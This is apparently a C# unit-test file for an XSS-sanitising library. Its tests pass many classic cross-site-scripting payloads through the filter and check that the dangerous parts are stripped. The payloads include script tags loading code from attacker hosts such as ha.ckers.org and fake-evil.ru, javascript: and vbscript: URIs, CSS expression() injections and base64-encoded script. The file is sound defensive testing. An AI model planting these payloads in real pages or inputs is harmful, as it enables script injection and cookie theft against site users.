204 lines
13 KiB
C#
204 lines
13 KiB
C#
|
|
using System;
|
|||
|
|
using Microsoft.VisualStudio.TestTools.UnitTesting;
|
|||
|
|
using Ufangx.Xss;
|
|||
|
|
using System.Collections.Generic;
|
|||
|
|
using System.Linq;
|
|||
|
|
using System.Threading;
|
|||
|
|
using System.Reflection;
|
|||
|
|
using System.Runtime.CompilerServices;
|
|||
|
|
using System.Text;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
|
|||
|
|
namespace Framework461Test
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
[TestClass]
|
|||
|
|
public class UnitTest1
|
|||
|
|
{
|
|||
|
|
void FilterAttacks(RichText richText, Func<string, bool> fn, [CallerMemberName] string propertyName = null)
|
|||
|
|
{
|
|||
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|||
|
|
stringBuilder.Append($"\n==== in {propertyName} ==================================================\n原文:\n{richText.Source}\n");
|
|||
|
|
|
|||
|
|
stringBuilder.Append("过滤\n");
|
|||
|
|
string clean = richText.ToString();
|
|||
|
|
stringBuilder.Append(clean);
|
|||
|
|
var isTrue = fn(clean);
|
|||
|
|
|
|||
|
|
stringBuilder.Append($"\n状态:{isTrue}");
|
|||
|
|
Console.WriteLine(stringBuilder.ToString());
|
|||
|
|
Assert.IsTrue(isTrue);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void testScriptAttacks()
|
|||
|
|
{
|
|||
|
|
FilterAttacks("<script src=\"/test.js\"></script>", str => str.IndexOf("script", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("test<script>alert(document.cookie)</script>", str => str.IndexOf("script", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<<<><<script src=http://fake-evil.ru/test.js>", str => str.IndexOf("<script", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<script<script src=http://fake-evil.ru/test.js>>", str => str.IndexOf("<script", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("<script", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", str => str.IndexOf("onload", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<BODY ONLOAD=alert('XSS')>", str => str.IndexOf("alert") == -1);
|
|||
|
|
FilterAttacks("<iframe src=http://ha.ckers.org/scriptlet.html <", str => str.IndexOf("<iframe", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", str => str.IndexOf("src", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void testImgAttacks()
|
|||
|
|
{
|
|||
|
|
FilterAttacks("<img src='http://www.myspace.com/img.gif'>", str => str.IndexOf("<img", StringComparison.OrdinalIgnoreCase) != -1);
|
|||
|
|
FilterAttacks("<img src=javascript:alert(document.cookie)>", str => str.IndexOf("<img", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<IMG SRC=javascript:alert('XSS')>",
|
|||
|
|
str => str.IndexOf("<img", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<IMG SRC=javascript:alert('XSS')>", str => string.IsNullOrEmpty(str));
|
|||
|
|
|
|||
|
|
FilterAttacks("<IMG SRC=javascript:alert('XSS')>", str => string.IsNullOrEmpty(str));
|
|||
|
|
|
|||
|
|
FilterAttacks("<IMG SRC=\"jav
ascript:alert('XSS');\">", str => str.IndexOf("alert", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<IMG SRC=\"javascript:alert('XSS')\"", str => str.IndexOf("javascript", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<IMG LOWSRC=\"javascript:alert('XSS')\">", str => str.IndexOf("javascript", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
FilterAttacks("<BGSOUND SRC=\"javascript:alert('XSS');\">", str => str.IndexOf("javascript", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void testHrefAttacks()
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
|
|||
|
|
FilterAttacks("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", str => str.IndexOf("href") == -1);
|
|||
|
|
FilterAttacks("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", str => str.IndexOf("href") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", str => str.IndexOf("ha.ckers.org") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", str => str.IndexOf("ha.ckers.org") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", str => str.IndexOf("xss.htc") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", str => str.IndexOf("javascript") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<IMG SRC='vbscript:msgbox(\"XSS\")'>", str => str.IndexOf("vbscript") == -1);
|
|||
|
|
|
|||
|
|
|
|||
|
|
FilterAttacks("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", str => str.IndexOf("<meta") == -1);
|
|||
|
|
FilterAttacks("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", str => str.IndexOf("<meta") == -1);
|
|||
|
|
FilterAttacks("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", str => str.IndexOf("<meta") == -1);
|
|||
|
|
FilterAttacks("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", str => str.IndexOf("iframe") == -1);
|
|||
|
|
FilterAttacks("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", str => str.IndexOf("javascript") == -1);
|
|||
|
|
FilterAttacks("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", str => str.IndexOf("background") == -1);
|
|||
|
|
FilterAttacks("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", str => str.IndexOf("background") == -1);
|
|||
|
|
FilterAttacks("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", str => str.IndexOf("javascript") == -1);
|
|||
|
|
FilterAttacks("<DIV STYLE=\"width: expression(alert('XSS'));\">", str => str.IndexOf("alert") == -1);
|
|||
|
|
FilterAttacks("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", str => str.IndexOf("alert") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", str => str.IndexOf("ript:alert") == -1);
|
|||
|
|
|
|||
|
|
FilterAttacks("<BASE HREF=\"javascript:alert('XSS');//\">", str => str.IndexOf("javascript") == -1);
|
|||
|
|
FilterAttacks("<BaSe hReF=\"http://arbitrary.com/\">", str => str.IndexOf("<base") == -1);
|
|||
|
|
FilterAttacks("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", str => str.IndexOf("<object") == -1);
|
|||
|
|
FilterAttacks("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", str => str.IndexOf("<object") == -1);
|
|||
|
|
FilterAttacks("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", str => str.IndexOf("<embed") == -1);
|
|||
|
|
FilterAttacks("<EMBED SRC=\" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", str => str.IndexOf("<embed") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("<script") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("<script") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("<script") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("<script") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", str => str.IndexOf("script") == -1);
|
|||
|
|
FilterAttacks("<SCRIPT SRC=http://ha.ckers.org/xss.js", str => str.IndexOf("<script") == -1);
|
|||
|
|
FilterAttacks("<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>", str => str.IndexOf("style") == -1);
|
|||
|
|
FilterAttacks("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", str => str.IndexOf("aim.exe") == -1);
|
|||
|
|
FilterAttacks("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", str => str.IndexOf("javascript") == -1);
|
|||
|
|
FilterAttacks("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", str => str.IndexOf("document") == -1);
|
|||
|
|
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void testCssAttacks()
|
|||
|
|
{
|
|||
|
|
FilterAttacks("<div style=\"position:absolute\">", str => str.IndexOf("position") == -1);
|
|||
|
|
FilterAttacks("<style>b { position:absolute;color:red; }</style>", str => str.IndexOf("position") == -1);
|
|||
|
|
FilterAttacks("<div style=\"z-index:25\">", str => str.IndexOf("position") == -1);
|
|||
|
|
FilterAttacks("<style>z-index:25</style>", str => str.IndexOf("position") == -1);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void TestAll()
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
Stopwatch stopwatch = new Stopwatch();
|
|||
|
|
stopwatch.Start();
|
|||
|
|
FilterAttacks("<IMG SRC=java\0script:alert(\"XSS\")>", str => str.IndexOf("<img", StringComparison.OrdinalIgnoreCase) == -1);
|
|||
|
|
testCssAttacks();
|
|||
|
|
testHrefAttacks();
|
|||
|
|
testScriptAttacks();
|
|||
|
|
testImgAttacks();
|
|||
|
|
stopwatch.Stop();
|
|||
|
|
Console.WriteLine($"\n==============程序运行的时间:{stopwatch.Elapsed.TotalMilliseconds}毫秒");
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[TestMethod]
|
|||
|
|
public void ThreadTest()
|
|||
|
|
{
|
|||
|
|
const int numThreads = 5;
|
|||
|
|
const int numRuns = 1000;
|
|||
|
|
var random = new Random(615322944);
|
|||
|
|
|
|||
|
|
for (int i = 0; i < numRuns; i++)
|
|||
|
|
{
|
|||
|
|
var allGo = new ManualResetEvent(false);
|
|||
|
|
Exception firstException = null;
|
|||
|
|
var failures = 0;
|
|||
|
|
|
|||
|
|
var tests = new UnitTest1();
|
|||
|
|
var waiting = numThreads;
|
|||
|
|
var methods = typeof(UnitTest1).GetTypeInfo().GetMethods()
|
|||
|
|
.Where(m => m.GetCustomAttributes(typeof(TestMethodAttribute), false).Any())
|
|||
|
|
.Where(m => m.Name != "ThreadTest");
|
|||
|
|
var threads = Shuffle(methods, random)
|
|||
|
|
.Take(numThreads)
|
|||
|
|
.Select(m => new Thread(() =>
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
if (Interlocked.Decrement(ref waiting) == 0) allGo.Set();
|
|||
|
|
m.Invoke(tests, null);
|
|||
|
|
}
|
|||
|
|
#pragma warning disable CA1031 // Do not catch general exception types
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
Interlocked.CompareExchange(ref firstException, ex, null);
|
|||
|
|
Interlocked.Increment(ref failures);
|
|||
|
|
}
|
|||
|
|
#pragma warning restore CA1031 // Do not catch general exception types
|
|||
|
|
})).ToList();
|
|||
|
|
|
|||
|
|
foreach (var thread in threads)
|
|||
|
|
thread.Start();
|
|||
|
|
foreach (var thread in threads)
|
|||
|
|
thread.Join();
|
|||
|
|
|
|||
|
|
Assert.IsNull(firstException);
|
|||
|
|
Assert.AreEqual(0, failures);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
public static IEnumerable<T> Shuffle<T>(IEnumerable<T> source, Random rng)
|
|||
|
|
{
|
|||
|
|
T[] elements = source.ToArray();
|
|||
|
|
for (int i = elements.Length - 1; i >= 0; i--)
|
|||
|
|
{
|
|||
|
|
// Swap element "i" with a random earlier element it (or itself)
|
|||
|
|
// ... except we don't really need to swap it fully, as we can
|
|||
|
|
// return it immediately, and afterwards it's irrelevant.
|
|||
|
|
int swapIndex = rng.Next(i + 1);
|
|||
|
|
yield return elements[swapIndex];
|
|||
|
|
elements[swapIndex] = elements[i];
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
}
|